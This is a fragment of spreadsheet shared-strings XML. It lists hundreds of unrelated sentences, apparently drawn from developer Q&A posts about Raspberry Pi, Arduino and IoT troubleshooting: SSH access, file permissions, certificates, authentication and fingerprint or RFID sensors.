    <t>Or maybe there is another way to manage my problem which is basically exposing an API on a local network created by a raspberry whilst being able to connect to others WIFI.</t>
  </si>
  <si>
    <t>I am trying to create a sort of lockout functionality for Windows 10 IoT Core so it can be used on a local display as well as by the Windows 10 IoT Remote Client.</t>
  </si>
  <si>
    <t>If you want to use your computer's screen for testing purpose, use ssh with the -X option: it does X requests forwarding.</t>
  </si>
  <si>
    <t>The solution is simple - throw away first frame and then immediately capture second - not corrupted - frame.</t>
  </si>
  <si>
    <t>So you have already deployed your application, and now your certificate (purchased or unpurchased) has expired, and youve examined the flowchart and determined that your customers are going to have to uninstall and reinstall the application.</t>
  </si>
  <si>
    <t>The reason is than my project folder created on OneDrive folder, so it caused this access error (I don't know why), although I run Visual Studio with admin rights.</t>
  </si>
  <si>
    <t>When you try to perform an operation on corrupted tasks, SchTasks.exe displays the following error message:</t>
  </si>
  <si>
    <t>Please remember when building the Schema for this Model to ensure that the password field is a minimum of 60 characters.</t>
  </si>
  <si>
    <t>Various products exist within the platform including Google Sign-in, Smart Lock for Passwords on Android, and the Google Identity Toolkit.</t>
  </si>
  <si>
    <t>Administrators can enforce password policies  including alphanumeric passwords or numeric PINs  across devices.</t>
  </si>
  <si>
    <t>Here is the C server code running on the Raspberry Pi:
Here is the relevant portion of the Android app code:
I have also included the following permissions in the manifest file:
&lt;uses-permission android:name="android.permission.INTERNET"/&gt;
&lt;uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/&gt; 
&lt;uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/&gt; 
The Android code gets stuck at the call to clientSocket.receive(receivePacket).</t>
  </si>
  <si>
    <t>With an iPhone 6 (with activated Apple Pay) you should receive a serial number that can be used to identify the device.</t>
  </si>
  <si>
    <t>If you are using a purchased certificate and it has expired, you can use an extended certificate to sign and deploy an update to your application, but it will look like a test certificate.</t>
  </si>
  <si>
    <t>When system start it creates a file and that location is stored in environment variable XAUTHORITY.</t>
  </si>
  <si>
    <t>There is adafruit fingerprint sensor but going the salvage path would be hard because of the hole Apple incovience with the close source.</t>
  </si>
  <si>
    <t>A hard job)
My Acheivements:
If I elected:
Need to do more reviewing :p
Will make SO a better place for new users
Will be keen on Serial Voting (As a victim of serial downvoting, I need to do that !)</t>
  </si>
  <si>
    <t>However, just for the sake of the answer or method, we can do something like this:
You can restrict the access to the script by getting the username of the person on the operating the system:</t>
  </si>
  <si>
    <t>The purpose of cloaking is sometimes to deceive search engines so they display the page when it would not otherwise be displayed (black hat SEO).</t>
  </si>
  <si>
    <t>I have no idea how can I configure a simple GPS tracker to hold that token.</t>
  </si>
  <si>
    <t>This is the fundamentals for a project that scans from an RFID as a key for a file encryption program.</t>
  </si>
  <si>
    <t>Effectively - posting the client_id, client_secret, username and password to the token endpoint and the IS server returns a JSON with an access token.</t>
  </si>
  <si>
    <t>Dimming it down is not good enough; it would be best if the screen were switched off, like in the locked device state.</t>
  </si>
  <si>
    <t>How do I remove that fisheye effect from the image or covert it into a simple image?</t>
  </si>
  <si>
    <t>The Next image should be safe as image2 (without using a loop that takes 5 photos in a row.</t>
  </si>
  <si>
    <t>To protect your own network, you can use HTTP Basic Authentication, which you have to add a username and a password to the request.</t>
  </si>
  <si>
    <t>With the XAuth API method you can supply Twitter credentials (username/password) and get back a usable access token in one go.</t>
  </si>
  <si>
    <t>With my Raspberry Pi, I managed to login pi user automatically, then start tomcat automatically and then start X server as well.</t>
  </si>
  <si>
    <t>If you are actually using different usernames as in your example, you could have one computer listening for ssh connections @ 82.90.233.234, and for user  spawn a shell session and for user desktop automatically spawn an ssh session to your desktop host.</t>
  </si>
  <si>
    <t>I get no errors and the debugging process shows it just doesn't recognize the device so deviceList is always null.</t>
  </si>
  <si>
    <t>It works, but on receiver side I often receive corrupted values and many values are missing.</t>
  </si>
  <si>
    <t>They're checking that all these identifiers have been defined which would be in other already included headers.</t>
  </si>
  <si>
    <t>Extended Profile Properties
Non-optional permissions for access to a user's data and that of their friends.</t>
  </si>
  <si>
    <t>"Sign in with Apple" allows users to sign in/up to your application/website using their Apple ID accounts.</t>
  </si>
  <si>
    <t>I suppose if I ever needed to log into the RPI this would make it more difficult...</t>
  </si>
  <si>
    <t>I would like to ask you:
Do you know any good, strong computers with IO gates?</t>
  </si>
  <si>
    <t>try
I made www-data user have the authority to execute it without password.</t>
  </si>
  <si>
    <t>I myself is looking for a solution to scan ip cameras on local network.</t>
  </si>
  <si>
    <t>$newLine);
            $smtpResponse = fgets($smtpConnect, 4096);
            $logArray['authrequest'] = "$smtpResponse";
            //send the username
            fputs($smtpConnect, base64_encode($username) .</t>
  </si>
  <si>
    <t>I have a username and password field that take the data you enter and check it with the users database.</t>
  </si>
  <si>
    <t>I have specifically checked that username and password are URL encoded.</t>
  </si>
  <si>
    <t>Can you guys have a look at the codes and find out where is the problem.</t>
  </si>
  <si>
    <t>I have taken a sample code for fingerprint scanner application in C# mono from this github link, Now I am running the same application in Raspbian os under the pi3 b board.</t>
  </si>
  <si>
    <t>(This would be especially useful as then I can just make it run on boot without having to connect a screen or ssh).</t>
  </si>
  <si>
    <t>So first I'd double check that you key is correct.</t>
  </si>
  <si>
    <t>When Spotify changes their SSL certificate you'll need to update the fingerprint.</t>
  </si>
  <si>
    <t>Is there any way to put a database on a server when the only way I can access that server is through an FTP username and password?</t>
  </si>
  <si>
    <t>The HID Device Descriptor shows the problem.</t>
  </si>
  <si>
    <t>Here is two png files of a fingerprint of the same person taken twice :</t>
  </si>
  <si>
    <t>Not really sure why because I am able to go through the az login no problem.</t>
  </si>
  <si>
    <t>If you check the api docs for the Arduino MQTT client, you'll see you need to provide a password argument as well as the username.</t>
  </si>
  <si>
    <t>My project on Matlab, I can extract fingerprint image.</t>
  </si>
  <si>
    <t xml:space="preserve">
chown changes ownership, not permissions.</t>
  </si>
  <si>
    <t>Make sure to change 9999 above to 0000 or 1234 or what ever it may be.</t>
  </si>
  <si>
    <t>to make it unencrypted).</t>
  </si>
  <si>
    <t>Use this object to perform the following types of tasks:
Request authorization for displaying alerts, playing sounds, or
badging the apps icon in response to local or remote notifications.</t>
  </si>
  <si>
    <t>I'm writing an app to control my robot with my Android phone over Bluetooth, everything is goes well, data is echoed and verified, but I'm having some trouble with the protocol, specifically I want my robot's wheels to turn when I send a command such as  or s,-30,-10... (values in percent).</t>
  </si>
  <si>
    <t>In order to tweet both a photo (taken from the picamera) and a status update, I ran the following code on my raspberry pi: 
With correctly filled in access and token keys I received the following error: 
After configuring both my raspberry pi and Twitter account to the same timezone, the problem persisted.</t>
  </si>
  <si>
    <t>I changed my code like this, so I can read the response:
I am using the default Key:
    uint8_t Password[4] = {0xFF, 0xFF, 0xFF, 0xFF };
I got the response 0xFFFC
Now I get confused, the deafault PACK is 0x0000, so it is not a PACK, if it is a NACK, why did I got a NACK with 2 byte?</t>
  </si>
  <si>
    <t>Copy that new api secret username and password at time of creation (as you can't see it once it's created) and put it to any rest client.</t>
  </si>
  <si>
    <t>In case anyone faces the same issue, I found this document which has explained the way to authenticate devices with Google Cloud without the consent of a user.</t>
  </si>
  <si>
    <t>Make sure that you add your container registry credentials to the deployment so that edge runtime can pull images.</t>
  </si>
  <si>
    <t>i have mjpg streamer running on my raspberry pi, and i made a android app to watch the stream, i just put a webview there and made it navigate to my streamers URL, but now i enabled the password feature on mjpg streamer.</t>
  </si>
  <si>
    <t>Here's what I did:
Here's the error I get:
error: expected unqualified-id before '{' token
I could use a  loop to initialize my array and get things done but my initialization seems correct to me, and I want to know what I did wrong.</t>
  </si>
  <si>
    <t>rootCA.pem)
Set tls opts with tsl_insecure: false, cert_reqs: SSL_VERIFY_PEER, tls version: tlsv1.2, ciphers: nil
Problems faced:
When trying to connect to server/broker gives error unable to create TLS_Context.</t>
  </si>
  <si>
    <t>I am running Flask server in python  on my local ip of raspberry pi.I have a requirement that if i Turn raspberry pi in to AP mode automatically open that server , The server actually consists of login form which takes username and password of wifi from an html file and connects it to wifi with that name.How to accomplish this?</t>
  </si>
  <si>
    <t>Also, if you work at this level you have to accept the fact that you will brick and/or destroy hardware, very easy to let the smoke out as a result of a software bug.</t>
  </si>
  <si>
    <t>I thought that would be much simpler and safe to use numbers and string identifier to open and close the message.</t>
  </si>
  <si>
    <t>On your Android device, go to Settings / Wireless &amp; Networks / More / Tethering &amp; Portable Hotspot... click "USB tethering"
Start up VX ConnectBot and SSH "pi@192.168.42.42"
Keep hitting return until it asks you for your password.</t>
  </si>
  <si>
    <t>I am not an expert on programming the Arduino but I know for sure that both parts (beacon detection and decoding) and calling a web service over WiFi are possible with the Arduino.</t>
  </si>
  <si>
    <t>SD Card is a Secure Digital Card available with Android which acts as the External Storage Directory.</t>
  </si>
  <si>
    <t>It also allows developers to resolve complex synchronization and arbitration problems through lock/unlock property APIs.</t>
  </si>
  <si>
    <t>The bread and butter of the Helpdesk is performing known-error fixes such as password resets and common application errors, as well as fulfilling requests for software installations and access to shared resources.</t>
  </si>
  <si>
    <t>Notable changes:
Requires Java 8
Fixing the Leak
Adding More for Developers
Increasing Scalability and Security</t>
  </si>
  <si>
    <t>People often first encounter them as a result of seeing an  after the permissions in the output from ls -l.  (The related symbol, a +, indicates that there are ACLs  access control lists  associated with the file.)</t>
  </si>
  <si>
    <t>This helps ensure that the data types are correct and required columns are present, preventing bad data from causing data corruption.</t>
  </si>
  <si>
    <t>These layers are used to consolidate code for sending out forgotten passwords, welcome wishes on signup, invoices for billing, and any other use case that requires a written notification to either a person or another system.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a flag set on a field in a database table that forces the RDBMS to create a unique identifier for the record.</t>
  </si>
  <si>
    <t>However, I have encountered an issue with giving these users permission to access IoT, which involves invoking a Lambda calling , and once that is done then everything works flawlessly.</t>
  </si>
  <si>
    <t>Finally communication with SmartCardReader connected to Windows 10 IoT core device is possible using HID reader (W10 IoT has driver).</t>
  </si>
  <si>
    <t>If I pull out the zstick from the raspberry pi and plug it into my Ubuntu VM, the lock's ready state is set to true.</t>
  </si>
  <si>
    <t>If it is because of that how to change the permissions on a type of file in general for example .jpg because each time it is about a new image so the permissions return to the image below:
https://imgur.com/VydSeAH</t>
  </si>
  <si>
    <t>Anything you can do to protect your source has to be undone in order to run the code, and there is nothing stopping anyone from simply watching it at that point.</t>
  </si>
  <si>
    <t>According to the source code of this project one is supposed to provide certificate's private key 
This is something I would like to avoid.</t>
  </si>
  <si>
    <t>So Let say student register his fingerprint from Lab-A then if he has a lecture in Lab-B then his fingerprint must also work their.</t>
  </si>
  <si>
    <t>Helpful tip, be sure to remember to change the permissions to read from the file
chmod u+x speech.sh
T7.</t>
  </si>
  <si>
    <t>IP addresses are scanned every minute of every hour of every day so be very careful.</t>
  </si>
  <si>
    <t>You can think of it as it doesn't matter if Lowes or Home depot makes the keys, just that everyone gets the correct key transported to them without getting them copied along the way.</t>
  </si>
  <si>
    <t>Your username could be different to my default pi one, if so just change the line above to reflect your username.</t>
  </si>
  <si>
    <t>A workaround is to save device IP address in device twin and update it when the IP changed.</t>
  </si>
  <si>
    <t>The point of a screen lock is for the device to be sure that the user is consciously interacting with the device as opposed to, for example, pocket-dialing.</t>
  </si>
  <si>
    <t>Initially targeting simple HID devices management.</t>
  </si>
  <si>
    <t>However, it acts like the key is being repeatedly pressed instead of a key being held down.</t>
  </si>
  <si>
    <t>Since I will probably store more than 163 fingerprints, I was wondering if I can change the storage.</t>
  </si>
  <si>
    <t>What I want to do is to use an rfID to check if it is registered in the database.</t>
  </si>
  <si>
    <t>I checked for the config and credentials files within .aws folder.</t>
  </si>
  <si>
    <t>when i mount the SD card and check if user-data is copied and valid yaml - then indeed it is.</t>
  </si>
  <si>
    <t>The first 6 digits is the unique code for the company that made the wifi dongle.</t>
  </si>
  <si>
    <t>As it turned out, the issue was the internal protection diodes in the Arduino.</t>
  </si>
  <si>
    <t>If after checking the steps above you are still having problems with corruption, please let us know.</t>
  </si>
  <si>
    <t>And there is a verification byte - u have to used that to make sure data is correct.</t>
  </si>
  <si>
    <t>It can be that you have self signed certificate, or something else happens that makes the certificate not valid.</t>
  </si>
  <si>
    <t>2) When a user logs in, their phone number and the UUID is saved to Firebase.</t>
  </si>
  <si>
    <t>The token is used in addition to or in place of a password to prove that the user is who they claim to be.</t>
  </si>
  <si>
    <t>A standard 13-digit (12 data, 1 check) barcode format.</t>
  </si>
  <si>
    <t>A profile used by Apple for verifying code signing for an application.</t>
  </si>
  <si>
    <t>If the JSESSIONID in the request is missing or invalid, the server generates a new unique one.</t>
  </si>
  <si>
    <t>Here is the code
And my error
I looked in AndroidAccessory.h and sure enough it is private, but what should I change to make this work?</t>
  </si>
  <si>
    <t>Anyway, I could never make the password to match.</t>
  </si>
  <si>
    <t>I checked usb by connecting other devices it works fine but the arduino is not recognized.</t>
  </si>
  <si>
    <t>I can not check whether my cc3000 work well because of this corrupt message.</t>
  </si>
  <si>
    <t>It is used to communicate with a fingerprint reading device.</t>
  </si>
  <si>
    <t>Xdotool seems like my best bet, but it doesn't work locally or over ssh.</t>
  </si>
  <si>
    <t>Im using a RFID reader to scan the card and Adafruit Fingerprint Module for fingerprint verification.</t>
  </si>
  <si>
    <t>Assuming this is the correct certificate, so far so good.</t>
  </si>
  <si>
    <t>If you want to write something like SSH, you'll have to make a pseudo-terminal.</t>
  </si>
  <si>
    <t>Make sure the permissions are correct on that file for the user you are running snort as.</t>
  </si>
  <si>
    <t>If you use MQTT 3.1, make sure each device has unique ID.</t>
  </si>
  <si>
    <t>No need SAS token as password; just leave it empty.</t>
  </si>
  <si>
    <t>The signing procedure was correct though.</t>
  </si>
  <si>
    <t>I'm trying to access a fingerprint reader in raspberry pi.</t>
  </si>
  <si>
    <t>So i figure this must be a permission issue, but what else should i do with the permissions?</t>
  </si>
  <si>
    <t>The detection is ought to be made from the Raspberry.</t>
  </si>
  <si>
    <t>Or if I connect to proxy server throught VPN(Some random Chrome Estension I am using Touch VPN) it works good.</t>
  </si>
  <si>
    <t>I have tried changing the fingerprint in FirebaseHttpClient.h file.</t>
  </si>
  <si>
    <t>Make sure the ID of the device is the ID of your phone.</t>
  </si>
  <si>
    <t xml:space="preserve">
This one was coded by a friend of mine!</t>
  </si>
  <si>
    <t>It's good idea to use
SET_PERI_REG_MASK(SPI_USER(1), SPI_USR_MOSI|SPI_USR_MOSI_HIGHPART);
WRITE_PERI_REG(SPI_W8(1), 0xff);
for MOSI data value.</t>
  </si>
  <si>
    <t>Another way would be to check the kernel code if the timer is used, if not you could simply export it via a kernel module, though that requires at least a basic understanding of the CPU, how the kernel works and how it is implemented without security implications or risk of crash (if not both).</t>
  </si>
  <si>
    <t>I am using HM-11 ble with arduino .When  put the device in authentication mode(for connectivity ask password) ,its asking password and get connected to android device which is lower than lollipop version.If the version is higher then it's getting connected without password or not getting connected at all(so not ask for password and error message has come pass is not matching.</t>
  </si>
  <si>
    <t>One, called the Trust Store holds the trusted certificates, such as the signer certificates issued by a Certificate Authority, or the personal certificates issued by peer nodes.</t>
  </si>
  <si>
    <t>In addition to a user-name which may be a another string or the person's email, it makes the server that the person who is trying to login(gain authorization to the site or service) more likely to trust them and allow them to gain access to it.</t>
  </si>
  <si>
    <t>Another solution is rooting mobile and setting 
what would happen if we change rp.usb_host=0 will the device act as the host and will charge the device or the device wont act as the host at all?</t>
  </si>
  <si>
    <t>I had changed the SSH port number in Raspberry Pi to 24 after reading articles, with WSL enabled may cause port number conflict.</t>
  </si>
  <si>
    <t>I do not want to expose the IP-camera publicly, only through the webservers port 80, which means somehow proxying the feed (I have the RTSP-feed url from the camera) in node somehow.</t>
  </si>
  <si>
    <t>), try another thing with windows live account (similar to the one suggested in the comment):
then type:
ehlo
auth login
In my case nothing happened.</t>
  </si>
  <si>
    <t>I'll keep my answer above as a reference, but you still have options via Bluetooth LE and potentially via NFC, as well (and I'm still ruling out Wi-Fi due to too many variations in network strength and detection).</t>
  </si>
  <si>
    <t>Right click on the cmd shortcut and choose "Run as Administrator"
Change to your android-sdk-windows\tools folder
Type:
adb should now say that you are connected.</t>
  </si>
  <si>
    <t>Solved the auth issue by specifying "application-default" whenever running "gcloud auth" commands (that means for both login and when printing the access token)
First run:
*** or you can set the "GOOGLE_APPLICATION_CREDENTIALS" env var instead for your service account's private_key_id.</t>
  </si>
  <si>
    <t>If you want to recognize walking and running you will need to use the 8g or 16g range if you want to be safe (the max needed will also depend on where the sensor is worn, as the accelerations are greater for certain parts of the body than others).</t>
  </si>
  <si>
    <t>Menu Items -- displaying CUSTOM menu items and sending fake notifications if the project is subscribed.</t>
  </si>
  <si>
    <t>These models contain a Secure Element, isolating card payment credentials from the main processor where your app runs.</t>
  </si>
  <si>
    <t>Custom toolbar buttons can invoke global actions, such as opening a monitored folder or forcing a sync operation.</t>
  </si>
  <si>
    <t>Sort out permissions or pass around the data so that you can get the RFID input without sudo: To create the keyboard events, you should be running under your graphical session, as yourself.</t>
  </si>
  <si>
    <t>Support for multiple means to download images including trust &amp; image verification.</t>
  </si>
  <si>
    <t>If the application is not open when the notification is received, the app will be badged and added to the dock (until the badge is cleared) to notify users.</t>
  </si>
  <si>
    <t>The struct will ultimately be encrypted and sent wirelessly over a radio link layer.</t>
  </si>
  <si>
    <t>My iothub built-in endpoint retention time is set for 1 day but the data has not been automatically deleted in months.</t>
  </si>
  <si>
    <t>OpenVPN allows peers to authenticate each other using a pre-shared secret key, certificates, or username/password.</t>
  </si>
  <si>
    <t>I can create a webserver( ASP.NET C#) and pass the command to the sql database of my relevant customer if google assistant can invoke the username or email, lightID, command to my webserver.</t>
  </si>
  <si>
    <t>What I would like to do is allow the user to enter their wifi details via my own interface and for my own c# program to make the chnages.</t>
  </si>
  <si>
    <t>An idea was that some permissions are missing, but if I try to add for exmaple &lt;iot:Capability Name="lowLevelDevices" /&gt;, I cannot longer build the application.</t>
  </si>
  <si>
    <t>If you have the  package, it will also do a timestamp saving trick to prevent the clock from being reset.</t>
  </si>
  <si>
    <t>It recorded the names of files in the system FAT, also encoding CP866 (as opposed to Windows-1251) retained pseudographic characters.</t>
  </si>
  <si>
    <t>I have cloned the repo locally, there it shows that redmine has inserted the deployment keys just fine:
repo    &lt;myProjectName&gt;-gitolite
RW+     =       redmine__deploy_key__1385587228_1212 redmine__deploy_key_...</t>
  </si>
  <si>
    <t>I wanted to have my Raspberry Pi update the system clock from a GPS on start up but now something has gone wrong and I can't login.</t>
  </si>
  <si>
    <t>It also does not show up as a connected device on the router admin screen.</t>
  </si>
  <si>
    <t>I tried to access the HID device directly, but it turns out keyboards are blocked ().</t>
  </si>
  <si>
    <t>This defeats the purpose of attempting to block access to the Storage screen in the first place.</t>
  </si>
  <si>
    <t>I am 100% sure that credentials and permissions are correct because using python code I can make successful requests.</t>
  </si>
  <si>
    <t>See Receiving error (Code 52) from a signed driver
This makes me wonder if there is something wrong with the certificate / pfx file itself.</t>
  </si>
  <si>
    <t>On the device the certificate can be anywhere that makes sense, but the certificate store is probably the best option.</t>
  </si>
  <si>
    <t>It is locked, but is still available for
  review in the Archived Forums folder.</t>
  </si>
  <si>
    <t>To make an identifier (name) case sensitive it needs to be quoted.</t>
  </si>
  <si>
    <t>I already found out that I can't use IPSec, since TCP/IP stack is hardware-implemented in these Arduino devices, so, we can't modify it.</t>
  </si>
  <si>
    <t>The problem now is that it seems that I can't make a TCP request with the Ethernet board.</t>
  </si>
  <si>
    <t>I made a form s
where users can edit their data (firstname, password, etc.).</t>
  </si>
  <si>
    <t>I'm trying to do the following with an arduino board one:
Make an authorization screen (Login).</t>
  </si>
  <si>
    <t>Asking a user to go and find their SHA1 certificate fingerprint using their browser dev tools and insert it into a web config portal is pretty much a no-no too.</t>
  </si>
  <si>
    <t>There is a lot of good stuff on hacking router firmware that may help.</t>
  </si>
  <si>
    <t>This will make it a little bit harder to get the credentials.</t>
  </si>
  <si>
    <t>Anonymous authentication with FTP still requires that you send a username and a password.</t>
  </si>
  <si>
    <t>This may indicate your disconnects are due to the clientID being re-used or stolen.</t>
  </si>
  <si>
    <t>The pitfall with camera:
Check the permissions in Manifest file, and restart the device.</t>
  </si>
  <si>
    <t>I think that the problem is the authentication, in the original article Microsoft tell you to call , have you made it on raspberry?</t>
  </si>
  <si>
    <t>A class that coordinates access to the fingerprint hardware.</t>
  </si>
  <si>
    <t>XPath Only Checkbox: Checking this will cause all element identifiers
to be created using XPath.</t>
  </si>
  <si>
    <t>I realize that this is an insider preview, but that should work, no?</t>
  </si>
  <si>
    <t>I assume i need a bluetooth shield to connect to the phone but i am unclear as to what else i would need to make this possible.</t>
  </si>
  <si>
    <t>Making the char unsigned does not change this, however.</t>
  </si>
  <si>
    <t>Is data getting corrupted as it leaves the Raspberry Pi?</t>
  </si>
  <si>
    <t>I am working on a simple fingerprint scanner that is connected to my Arduino Uno.</t>
  </si>
  <si>
    <t>Physical key -&gt; GPIO RPI -&gt; Callback -&gt; websocket -&gt; client -&gt; show jpg from:
gphotofs mounted file system.</t>
  </si>
  <si>
    <t>When the user enters id, the python app checks if the id is already present in the DB.</t>
  </si>
  <si>
    <t>I just have problems connecting to the database only not the login.</t>
  </si>
  <si>
    <t>I have written a fingerprint scanner application in C# and using mono, I am running the same application in Raspbian os under the pi3 board.</t>
  </si>
  <si>
    <t>For example:
Is all that would be needed to turn off WIFI (with the correct app permissions).</t>
  </si>
  <si>
    <t>), the data isn't correctly decryptable if you something is missing from the records.</t>
  </si>
  <si>
    <t>you must it must show the display on your computer from which you are ssh'ing.</t>
  </si>
  <si>
    <t>Several models have fingerprint readers for example.</t>
  </si>
  <si>
    <t>These identifiers persists across application launches.</t>
  </si>
  <si>
    <t>AWS Cognito (officially branded as Amazon Cognito) is a user authentication and authorization service provided by Amazon Web Services.</t>
  </si>
  <si>
    <t>I've checked and changed my permissions of /dev/ to 'drwxr-xr-x 12 pi root 3100 Sep 28 15:58 dev'.</t>
  </si>
  <si>
    <t>I am trying to make my ssh server(running on a raspberry pi) run SSH without a password.</t>
  </si>
  <si>
    <t>I'm working with a fingerprint scanner futronic FS80 on my Raspberry Pi.</t>
  </si>
  <si>
    <t>That's why copying your authorized_keys to id_rsa elsewhere doesn't make much sense.</t>
  </si>
  <si>
    <t>You should adjust the permissions of the script or the Apache user accordingly.</t>
  </si>
  <si>
    <t>For ssh -X to make sense you have to have an X (Xwindows) server running on the system you are ssh'ing from.</t>
  </si>
  <si>
    <t>It is possible that your fonts file is corrupt.</t>
  </si>
  <si>
    <t>The song has been encoded from numeric values.</t>
  </si>
  <si>
    <t>Could the AudioServices file be corrupted somehow?</t>
  </si>
  <si>
    <t>I always get "Invalid / Corrupted Jar File" error.</t>
  </si>
  <si>
    <t>Any hacks gangsters?</t>
  </si>
  <si>
    <t>I have an issue with the WiFi shield.</t>
  </si>
  <si>
    <t>May i know what's wrong with the codes?</t>
  </si>
  <si>
    <t>I want to do something similar to the following pseudocode.</t>
  </si>
  <si>
    <t>When I try to link my sql file (lahman2012.sql) to the database I get an error even though I use the password above (password)</t>
  </si>
  <si>
    <t>I use command chmod 777 and chown and chgrp to change the permission of the file, but it still doesn't work.</t>
  </si>
  <si>
    <t>The issue I'm having is with my Uno R3 and WiFi Shield.</t>
  </si>
  <si>
    <t>The button2 is like an enter key.</t>
  </si>
  <si>
    <t>Although, I can't get my UsbManager to recognized my device.</t>
  </si>
  <si>
    <t>I am currently trying to do face recognition from a webcam connected to a Raspberry Pi and using the openCV Java wrapper.</t>
  </si>
  <si>
    <t>While this isn't a problem, the server sometimes segfaults.</t>
  </si>
  <si>
    <t>But if this is true, why Raspberry keeps on and I got no corrupted data?</t>
  </si>
  <si>
    <t>What is my authentication supposed to be?</t>
  </si>
  <si>
    <t>So I guess what I'm really after is how does Linux go from the password raspberry to 0Iyzi5arkBfi8/FhDCKyEZ.nN77Jd.JdnIJqBFcD/QfZrruFzTu9PHit3J7qROeMPrZL9QgoP/W1XtwOpnPFM/.</t>
  </si>
  <si>
    <t>I'm having problems connecting to my server via ssh.</t>
  </si>
  <si>
    <t>After user hits ctrl-c, it should logoff.</t>
  </si>
  <si>
    <t>But to connect to my APN I need to set username and password.</t>
  </si>
  <si>
    <t>can someone look into my codes and see what is wrong?</t>
  </si>
  <si>
    <t>Or does another file need to have the correct permissions?</t>
  </si>
  <si>
    <t>terminal ssh to my raspberry
thanks</t>
  </si>
  <si>
    <t>But I am still asked for a password when I try to connect.</t>
  </si>
  <si>
    <t>The wifi password is hardcoded in the Lua code.</t>
  </si>
  <si>
    <t>I assure that stream is not corrupted.</t>
  </si>
  <si>
    <t>I reinstalled ssh in pi, still it does not work.</t>
  </si>
  <si>
    <t>It's not a security issue because I want to ask the user if I can...</t>
  </si>
  <si>
    <t>Is this a permissions issue?</t>
  </si>
  <si>
    <t>Could it be a permissions for Python issue?</t>
  </si>
  <si>
    <t>if(conn.connect(server_addr,3306,user,password)){ } &lt;-- This seems not working.</t>
  </si>
  <si>
    <t>The user authentication is done with a username and a password.</t>
  </si>
  <si>
    <t>The python script is fine, but it asks for a password when I run it.</t>
  </si>
  <si>
    <t>Is it possible that there are any problems with the user/file permissions?</t>
  </si>
  <si>
    <t>If I search the web, I get jumbles of confusing hacks.</t>
  </si>
  <si>
    <t>when I'm accessing the pi via ssh and run the command its working.</t>
  </si>
  <si>
    <t>Here is what I have now:
Slave
Master
I'm using a fixed value to debug the code.</t>
  </si>
  <si>
    <t>I also changed my authentication to 'None'.</t>
  </si>
  <si>
    <t>It would appear it does not like the getKey() command
I have also tried with thingspeak and it has the same problem.</t>
  </si>
  <si>
    <t>So it's likely not a permissions problem.</t>
  </si>
  <si>
    <t>Are those identifiers necessary?</t>
  </si>
  <si>
    <t>Basically I need my linux device to auto-logon with the user 'mon' and no password.</t>
  </si>
  <si>
    <t>I have a new Raspberry Pi 3B and cannot ssh into it at all.</t>
  </si>
  <si>
    <t>I'm having an issue while configuring authentication on my Mosquitto.</t>
  </si>
  <si>
    <t>But there is never any detection.</t>
  </si>
  <si>
    <t>Preferably behind a password.</t>
  </si>
  <si>
    <t>When I run sudo gammu getsecuritystatus it says that I have to enter my SIM-PIN.</t>
  </si>
  <si>
    <t>What do you think is wrong with these codes?</t>
  </si>
  <si>
    <t>Everytime I verify my code, this error comes out...</t>
  </si>
  <si>
    <t>If I wanted to connect to activeMQ, I should pass Username and Password.</t>
  </si>
  <si>
    <t>I guess it has something to do with AUTH_MODE?</t>
  </si>
  <si>
    <t>It works autonomously and every one in a while has to connect to my server via ssh.</t>
  </si>
  <si>
    <t>I need something similar with a certificate.</t>
  </si>
  <si>
    <t>Or is there any problem in account and permission?</t>
  </si>
  <si>
    <t>I tried to rewrite the firmware in linux but at a point it says that the device is not plugged.</t>
  </si>
  <si>
    <t>how do I encrypt or obfuscate the card?</t>
  </si>
  <si>
    <t>I hope someone can help me...
CrypticEagle</t>
  </si>
  <si>
    <t>In some situations, Spark checkpointing does not work as we want.</t>
  </si>
  <si>
    <t>So I presume the problem is in my definition of HID_SerialTouchReport.</t>
  </si>
  <si>
    <t>It will take 4 digit password from the user, but when the user enter the digit through the keypad, nothing was display on the lcd.</t>
  </si>
  <si>
    <t>The security is not really relevant.</t>
  </si>
  <si>
    <t>What do I have to change in my pg_hba.conf file so that george can connect to a dabatabse using a password.</t>
  </si>
  <si>
    <t>Not a permissions issue at all.</t>
  </si>
  <si>
    <t>That's sort of works, but seems like a hack.</t>
  </si>
  <si>
    <t>I have tested the username and password.</t>
  </si>
  <si>
    <t>Using the x509Certificate2 was a thought maybe it was the correct way, but still no joy.</t>
  </si>
  <si>
    <t>I'm trying to use face recognition with Raspberry pi3 and pi camera.</t>
  </si>
  <si>
    <t>Hi I'm 100 percent new to linux and ssh.</t>
  </si>
  <si>
    <t>Basically using AWS Cognito for authentication and authorization.</t>
  </si>
  <si>
    <t>And coded as below but error happened.</t>
  </si>
  <si>
    <t>Password and username is correct.</t>
  </si>
  <si>
    <t>When I run the python script apparently he doesn't get the ssh keys in ~/.ssh.</t>
  </si>
  <si>
    <t>The PHP code in file "write_data_w2"
I'm not using a password for the user "w123".</t>
  </si>
  <si>
    <t>), some data is corrupted.</t>
  </si>
  <si>
    <t>Maybe there is something wrong with the permissions?</t>
  </si>
  <si>
    <t>Everything was ok. Then, I reinstall SecurityDaemon.</t>
  </si>
  <si>
    <t>File gets corrupted.</t>
  </si>
  <si>
    <t>Is there a way to know which certificate is automatically used by the OS for HttpURLConnection ?</t>
  </si>
  <si>
    <t>And here is the script on the RPI:
would it be due to some unix permissions?</t>
  </si>
  <si>
    <t>So the certificate itself is not an issue.</t>
  </si>
  <si>
    <t>What I suppose to do with certificate.?</t>
  </si>
  <si>
    <t>Working with SSH from my MacBookPro works without problems.</t>
  </si>
  <si>
    <t>W/System.err: Permission denied (publickey,password).</t>
  </si>
  <si>
    <t>How can I clear cached certificate gracefully after hostname change?</t>
  </si>
  <si>
    <t>Qr codes are decoded very well.</t>
  </si>
  <si>
    <t>I have problems about JWT authentication.</t>
  </si>
  <si>
    <t>*cloudiot_mqtt_example.py
*gateway_demo.py
However, I don't know how to confirm NO JWT-auth.</t>
  </si>
  <si>
    <t>The error persits even when I change access permissions to rw-rw-rw-.</t>
  </si>
  <si>
    <t>I am trying to connect my Arduino "MKR gsm 1400" with a Twilio Trust Onboard SIM card.</t>
  </si>
  <si>
    <t>I've tried resetting and unplugging and re-uploading the firmware to the ADK board.</t>
  </si>
  <si>
    <t>looks like an authentication problem.</t>
  </si>
  <si>
    <t>This is kind of a hack, though.</t>
  </si>
  <si>
    <t>Okay, thanks to John Jesus, I just had to change the permissions of the file /dev/ttyACM0.</t>
  </si>
  <si>
    <t>- Especially the "authenticity_token" might cause you trouble. )</t>
  </si>
  <si>
